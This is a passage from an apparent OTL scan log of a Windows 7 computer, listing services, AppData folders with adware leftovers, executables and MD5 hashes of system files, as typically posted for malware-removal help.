[Auto | Running] -- C:\Windows\System32\wscsvc.dll -- (wscsvc) SRV - [2010/11/20 13:21:26 | 000,168,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\srvsvc.dll -- (LanmanServer) SRV - [2010/11/20 13:21:19 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\shsvcs.dll -- (ShellHWDetection) No service found with a name of slsvc SRV - [2010/11/20 13:21:05 | 000,750,592 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\schedsvc.dll -- (Schedule) SRV - [2010/11/20 13:21:28 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\tapisrv.dll -- (TapiSrv) SRV - [2009/07/14 02:16:16 | 000,037,376 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\themeservice.dll -- (Themes) SRV - [2012/05/01 05:44:12 | 000,164,352 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\profsvc.dll -- (ProfSvc) SRV - [2010/11/20 13:17:51 | 001,025,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\VSSVC.exe -- (VSS) SRV - [2010/11/20 13:18:05 | 000,473,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\audiosrv.dll -- (Audiosrv) SRV - [2010/11/20 13:18:05 | 000,473,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\audiosrv.dll -- (AudioEndpointBuilder) SRV - [2010/11/20 13:21:06 | 000,125,952 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\sdrsvc.dll -- (SDRSVC) SRV - [2013/05/27 05:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\mpsvc.dll -- (WinDefend) SRV - [2010/11/20 13:21:35 | 001,086,976 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wevtsvc.dll -- (eventlog) SRV - [2010/11/20 13:19:40 | 000,566,272 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\MPSSVC.dll -- 
(MpsSvc) SRV - [2010/11/20 13:21:35 | 000,463,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wiaservc.dll -- (StiSvc) SRV - [2010/11/20 13:17:22 | 000,073,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\windows\System32\msiexec.exe -- (msiserver) SRV - [2009/07/14 02:16:19 | 000,168,960 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\wbem\WMIsvc.dll -- (Winmgmt) SRV - [2012/06/02 23:19:17 | 001,933,848 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wuaueng.dll -- (wuauserv) SRV - [2010/11/20 13:18:34 | 000,214,016 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\dot3svc.dll -- (dot3svc) SRV - [2009/07/14 02:16:19 | 000,829,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wlansvc.dll -- (Wlansvc) SRV - [2010/11/20 13:21:36 | 000,084,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wkssvc.dll -- (LanmanWorkstation) Invalid Environment Variable: ALLUSERSPROFILE\ [color=#A23BEC]< %ALLUSERSPROFILE%\Application Data\*.exe /s >[/color] [color=#A23BEC]< %APPDATA%\*. 
>[/color] [2013/05/27 12:58:33 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Adobe [2014/02/22 16:53:59 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Advanced System Protector [2013/12/30 21:02:02 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Aimersoft Video Converter Ultimate [2013/09/26 19:59:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\AVS4YOU [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\BabSolution [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\BabylonToolbar [2013/09/13 08:17:59 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\BatteryBar [2012/06/08 20:05:21 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Blitware [2011/02/03 13:18:38 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Canon [2013/05/27 10:25:15 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\com.adobe.formscentral.FormsCentralForAcrobat [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Complitly [2011/03/06 09:51:56 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Corel [2013/04/12 09:18:51 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\CorelHomeOffice [2011/11/04 18:54:59 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Disk Cleaner [2014/02/22 17:20:29 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\dll-files.com [2013/11/26 17:53:28 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\dvdcss [2014/01/02 15:10:34 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\DVDVideoSoft [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\File Scout [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\FissaSearch [2013/05/27 14:09:54 | 000,000,000 | ---D 
| M] -- C:\Users\APPE-ATELIER\AppData\Roaming\FIXIO PC Utilities [2010/12/06 12:23:28 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\FLEXnet [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\GoforFiles [2010/12/11 21:24:11 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Google [2012/03/25 19:07:59 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Hewlett-Packard [2012/05/12 17:01:49 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Hitivi [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\HomeTab [2013/04/27 11:08:33 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\hpqLog [2010/12/06 12:23:12 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Identities [2012/03/25 19:04:12 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\InstallShield [2010/12/06 15:28:35 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Macromedia [2014/02/22 14:57:57 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Malwarebytes [2013/01/04 12:00:13 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Micro Application [2013/11/30 22:01:52 | 000,000,000 | --SD | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft [2011/09/12 14:15:38 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Mozilla [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\newnext.me [2013/05/21 14:53:15 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Nuance [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenCandy [2013/01/23 18:14:54 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenOffice.org [2013/09/29 09:01:22 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Opera Software [2013/05/27 10:28:18 | 000,000,000 | ---D | M] -- 
C:\Users\APPE-ATELIER\AppData\Roaming\PDAppFlex [2011/03/06 12:29:14 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\QuickZip [2013/04/27 10:45:40 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\RegistryKeys [2011/05/25 08:00:56 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Roxio [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\SimplyTech [2012/09/05 15:44:21 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Skype [2012/03/26 10:01:45 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\SolidDocuments [2014/02/22 14:58:00 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\SUPERAntiSpyware.com [2014/02/22 17:08:58 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\systweak [2011/09/29 13:31:56 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Tific [2013/05/31 14:08:08 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Topckit [2013/04/27 11:04:39 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\TuneUp Software [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\ValueApps [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\vlc [2012/05/12 17:12:48 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Xilisoft Corporation [2012/02/10 19:13:13 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\XnView [2010/12/06 12:11:28 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Zeon [2014/02/22 15:39:22 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\ZHP [2013/12/30 21:01:35 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A} [color=#A23BEC]< %APPDATA%\*.exe /s >[/color] [2013/08/04 15:00:50 | 000,010,320 | ---- | M] () -- 
C:\Users\APPE-ATELIER\AppData\Roaming\BabSolution\Shared\BabMaint.exe [2013/08/28 14:22:53 | 000,340,464 | ---- | M] (Babylon Ltd.) -- C:\Users\APPE-ATELIER\AppData\Roaming\BabSolution\Shared\GUninstaller.exe [2013/08/27 08:40:34 | 003,621,832 | ---- | M] (HomeTab ) -- C:\Users\APPE-ATELIER\AppData\Roaming\Complitly\hometab.exe [2011/07/11 14:27:34 | 000,091,128 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Complitly\KeepMeUpdated.exe [2011/07/11 14:27:34 | 000,091,128 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Complitly\64\KeepMeUpdated.exe [2013/05/28 14:20:14 | 000,259,584 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\File Scout\filescout.exe [2013/06/21 16:16:14 | 000,062,902 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\File Scout\uninst.exe [2011/03/06 12:30:06 | 000,020,992 | R--- | M] (Quick Zip Dev) -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\MediaPlayer.exe [2011/03/06 12:30:06 | 000,192,000 | R--- | M] (Quick Zip Dev) -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\QuickZip.exe [2011/03/06 12:30:06 | 000,004,608 | R--- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\RunAsAdmin.exe [2011/03/06 12:30:06 | 000,155,136 | R--- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\ShellRegister.exe [2011/03/06 12:30:06 | 000,071,168 | R--- | M] (Quick Zip Dev) -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\Translator.exe [2013/01/07 15:09:28 | 000,010,134 | R--- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{C06EFB22-B5DB-46C5-9215-BCB5C19C0858}\ARPPRODUCTICON.exe [2013/01/07 15:09:28 | 000,053,248 | R--- | M] (Macrovision Corporation) -- 
C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{C06EFB22-B5DB-46C5-9215-BCB5C19C0858}\NewShortcut1_C06EFB22B5DB46C59215BCB5C19C0858.exe [2012/02/11 21:53:40 | 000,010,134 | R--- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{CAE7D1D9-3794-4169-B4DD-964ADBC534EE}\ARPPRODUCTICON.exe [2011/12/30 19:54:46 | 000,183,096 | ---- | M] (Microsoft Corporation) -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Outil de notification de cadeaux MSN\msnotif.exe [2013/04/02 19:33:26 | 000,773,104 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenCandy\4D4703175AF14432AB1D0EBE97BF4B63\DeltaTB.exe [2013/03/27 18:11:40 | 000,433,448 | ---- | M] (OpenCandy) -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenCandy\4D4703175AF14432AB1D0EBE97BF4B63\OCBrowserHelper_1.0.6.124.exe [2012/12/28 03:40:08 | 006,151,296 | ---- | M] (Uniblue Systems Ltd ) -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenCandy\D956304CC27E4E4898B1AC3CFDF2BE4A\speedupmypcFR.exe [color=#A23BEC]< %temp%\.exe /s >[/color] [color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color] [2014/02/03 03:00:36 | 000,487,508 | ---- | M] () -- C:\monitor.exe [2013/03/11 20:19:10 | 000,401,408 | ---- | M] () -- C:\wget.exe [color=#A23BEC]< %systemroot%\*. 
/mp /s >[/color] [color=#A23BEC]< %systemroot%\system32\*.dll /lockedfiles >[/color] [1 C:\windows\system32\*.tmp files -> C:\windows\system32\*.tmp -> ] [color=#A23BEC]< %systemroot%\Tasks\*.job /lockedfiles >[/color] [color=#A23BEC]< %systemroot%\system32\drivers\*.sys /lockedfiles >[/color] [2014/01/08 07:09:36 | 000,020,480 | ---- | M] ()[b] Unable to obtain MD5[/b] -- C:\windows\system32\drivers\pcwatch.sys [color=#A23BEC]< %systemroot%\System32\config\*.sav >[/color] [2013/09/23 10:15:29 | 018,690,048 | ---- | M] () -- C:\windows\System32\config\system.sav [color=#A23BEC]< MD5 for: AGP440.SYS >[/color] [2009/07/14 02:26:15 | 000,053,312 | ---- | M] (Microsoft Corporation) MD5=507812C3054C21CEF746B6EE3D04DD6E -- C:\Windows\System32\drivers\AGP440.sys [2009/07/14 02:26:15 | 000,053,312 | ---- | M] (Microsoft Corporation) MD5=507812C3054C21CEF746B6EE3D04DD6E -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_x86_neutral_a97a2a0d0fbc6696\AGP440.sys [2009/07/14 02:26:15 | 000,053,312 | ---- | M] (Microsoft Corporation) MD5=507812C3054C21CEF746B6EE3D04DD6E -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.1.7601.17514_none_bc1a57271cf2f285\AGP440.sys [color=#A23BEC]< MD5 for: ATAPI.SYS >[/color] [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\drivers\atapi.sys [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_x86_neutral_a5025d31bee4647c\atapi.sys [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_x86_neutral_fab873f3e8a3315c\atapi.sys [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- 
C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_df3f92057fcbe7a7\atapi.sys
[2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.18231_none_df26d4d57fdef5b0\atapi.sys
[2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.22414_none_dfc9143c98e9a6c4\atapi.sys

[color=#A23BEC]< MD5 for: CNGAUDIT.DLL >[/color]
[2009/07/14 02:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\System32\cngaudit.dll
[2009/07/14 02:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.1.7600.16385_none_e83a414890e8132b\cngaudit.dll

[color=#A23BEC]< MD5 for: EXPLORER.EXE >[/color]
[2011/02/26 06:19:21 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_54149f9ef14031fc\explorer.exe
[2010/11/20 13:17:09 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_53bc10fdd7fe87ca\explorer.exe
[2010/11/20 13:17:09 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_53bc10fdd7fe87ca\explorer.exe
[2011/02/25 06:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\explorer.exe
[2011/02/25 06:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_5389023fd8245f84\explorer.exe

[color=#A23BEC]< MD5 for: IASTOR.SYS >[/color]
[2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\Program Files\Intel\Intel Matrix Storage Manager\driver\IaStor.sys
[2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\swsetup\Drivers\32\HDD\IaStor.sys
[2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\swsetup\INTELMSM\Winall\Driver\IaStor.sys
[2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\Windows\System32\drivers\iaStor.sys
[2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\Windows\System32\DriverStore\FileRepository\iaahci.inf_x86_neutral_edff5f7f3a6a240c\iaStor.sys
[2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\Windows\System32\DriverStore\FileRepository\iastor.inf_x86_neutral_ae92c2aaca5fffd6\iaStor.sys
[2010/01/08 22:45:26 | 000,409,112 | ---- | M] (Intel Corporation) MD5=DC0B4553D089E2BD07AEBD9EA30BEAFB -- C:\Program Files\Intel\Intel Matrix Storage Manager\driver64\IaStor.sys
[2010/01/08 22:45:26 | 000,409,112 | ---- | M] (Intel Corporation) MD5=DC0B4553D089E2BD07AEBD9EA30BEAFB -- C:\swsetup\Drivers\64\HDD\IaStor.sys
[2010/01/08 22:45:26 | 000,409,112 | ---- | M] (Intel Corporation) MD5=DC0B4553D089E2BD07AEBD9EA30BEAFB -- C:\swsetup\INTELMSM\Winall\Driver64\IaStor.sys

[color=#A23BEC]< MD5 for: IASTORV.SYS >[/color]
[2011/03/11 06:38:51 | 000,332,160 | ---- | M] (Intel Corporation) MD5=5CD5F9A5444E6CDCB0AC89BD62D8B76E -- C:\Windows\System32\drivers\iaStorV.sys
[2011/03/11 06:38:51 | 000,332,160 | ---- | M] (Intel Corporation) MD5=5CD5F9A5444E6CDCB0AC89BD62D8B76E -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_x86_neutral_0bcee2057afcc090\iaStorV.sys
[2011/03/11 06:38:51 | 000,332,160 | ---- | M] (Intel Corporation) MD5=5CD5F9A5444E6CDCB0AC89BD62D8B76E -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.1.7601.17577_none_b0daddb9e6380745\iaStorV.sys
[2011/03/11 06:28:00 | 000,332,160 | ---- | M] (Intel Corporation) MD5=778D0E6D7D9EBA0C403BADBAAD41DB20 -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.1.7601.21680_none_b152a892ff64119f\iaStorV.sys
[2010/11/20 13:29:54 | 000,332,160 | ---- | M] (Intel Corporation) MD5=A3CAE5D281DB4CFF7CFF8233507EE5AD -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_iastorv.inf_31bf3856ad364e35_6.1.7601.17514_none_b118bc63e60a139a\iaStorV.sys
[2010/11/20 13:29:54 | 000,332,160 | ---- | M] (Intel Corporation) MD5=A3CAE5D281DB4CFF7CFF8233507EE5AD -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_x86_neutral_668286aa35d55928\iaStorV.sys
[2010/11/20 13:29:54 | 000,332,160 | ---- | M] (Intel Corporation) MD5=A3CAE5D281DB4CFF7CFF8233507EE5AD -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.1.7601.17514_none_b118bc63e60a139a\iaStorV.sys

[color=#A23BEC]< MD5 for: NETLOGON.DLL >[/color]
[2010/11/20 13:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_ffbf212e963c0162\netlogon.dll
[2010/11/20 13:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\System32\netlogon.dll
[2010/11/20 13:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_ffbf212e963c0162\netlogon.dll

[color=#A23BEC]< MD5 for: NVSTOR.SYS >[/color]
[2011/03/11 06:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\System32\drivers\nvstor.sys
[2011/03/11 06:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_x86_neutral_0276fc3b3ea60d41\nvstor.sys
[2011/03/11 06:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17577_none_3ba44e691d6eb11d\nvstor.sys
[2011/03/11 06:28:10 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=66D468654A58594F5F3BA63D5AD5B1AF -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.21680_none_3c1c1942369abb77\nvstor.sys
[2010/11/20 13:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17514_none_3be22d131d40bd72\nvstor.sys
[2010/11/20 13:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_x86_neutral_dd659ed032d28a14\nvstor.sys
[2010/11/20 13:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17514_none_3be22d131d40bd72\nvstor.sys

[color=#A23BEC]< MD5 for: SCECLI.DLL >[/color]
[2010/11/20 13:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_3a154c47375d881d\scecli.dll
[2010/11/20 13:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\System32\scecli.dll
[2010/11/20 13:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_3a154c47375d881d\scecli.dll

[color=#A23BEC]< MD5 for: SERVICES.EXE >[/color]
[2009/07/14 02:14:36 | 000,259,072 | ---- | M] (Microsoft Corporation) MD5=5F1B6A9C35D3D5CA72D6D6FDEF9747D6 -- C:\Windows\System32\services.exe
[2009/07/14 02:14:36 | 000,259,072 | ---- | M] (Microsoft Corporation) MD5=5F1B6A9C35D3D5CA72D6D6FDEF9747D6 -- C:\Windows\winsxs\x86_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_cf36168b2e9c967b\services.exe

[color=#A23BEC]< MD5 for: SVCHOST.EXE >[/color]
[2009/07/14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\System32\svchost.exe
[2009/07/14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_b591afc466a15356\svchost.exe

[color=#A23BEC]< MD5 for: WININIT.EXE >[/color]
[2009/07/14 02:14:45 | 000,096,256 | ---- | M] (Microsoft Corporation) MD5=B5C5DCAD3899512020D135600129D665 -- C:\Windows\System32\wininit.exe
[2009/07/14 02:14:45 | 000,096,256 | ---- | M] (Microsoft Corporation) MD5=B5C5DCAD3899512020D135600129D665 -- C:\Windows\winsxs\x86_microsoft-windows-wininit_31bf3856ad364e35_6.1.7600.16385_none_30c90ef265a43c13\wininit.exe

[color=#A23BEC]< MD5 for: WINLOGON.EXE >[/color]
[2010/11/20 13:17:54 | 000,286,720 | ---- | M] (Microsoft Corporation) MD5=6D13E1406F50C66E2A95D97F22C47560 -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_71ca6b0233339500\winlogon.exe
[2010/11/20 13:17:54 | 000,286,720 | ---- | M] (Microsoft Corporation) MD5=6D13E1406F50C66E2A95D97F22C47560 -- C:\Windows\System32\winlogon.exe
[2010/11/20 13:17:54 | 000,286,720 | ---- | M] (Microsoft Corporation) MD5=6D13E1406F50C66E2A95D97F22C47560 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_71ca6b0233339500\winlogon.exe

[color=#A23BEC]< hklm\software\clients\startmenuinternet|command /rs >[/color]
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation)
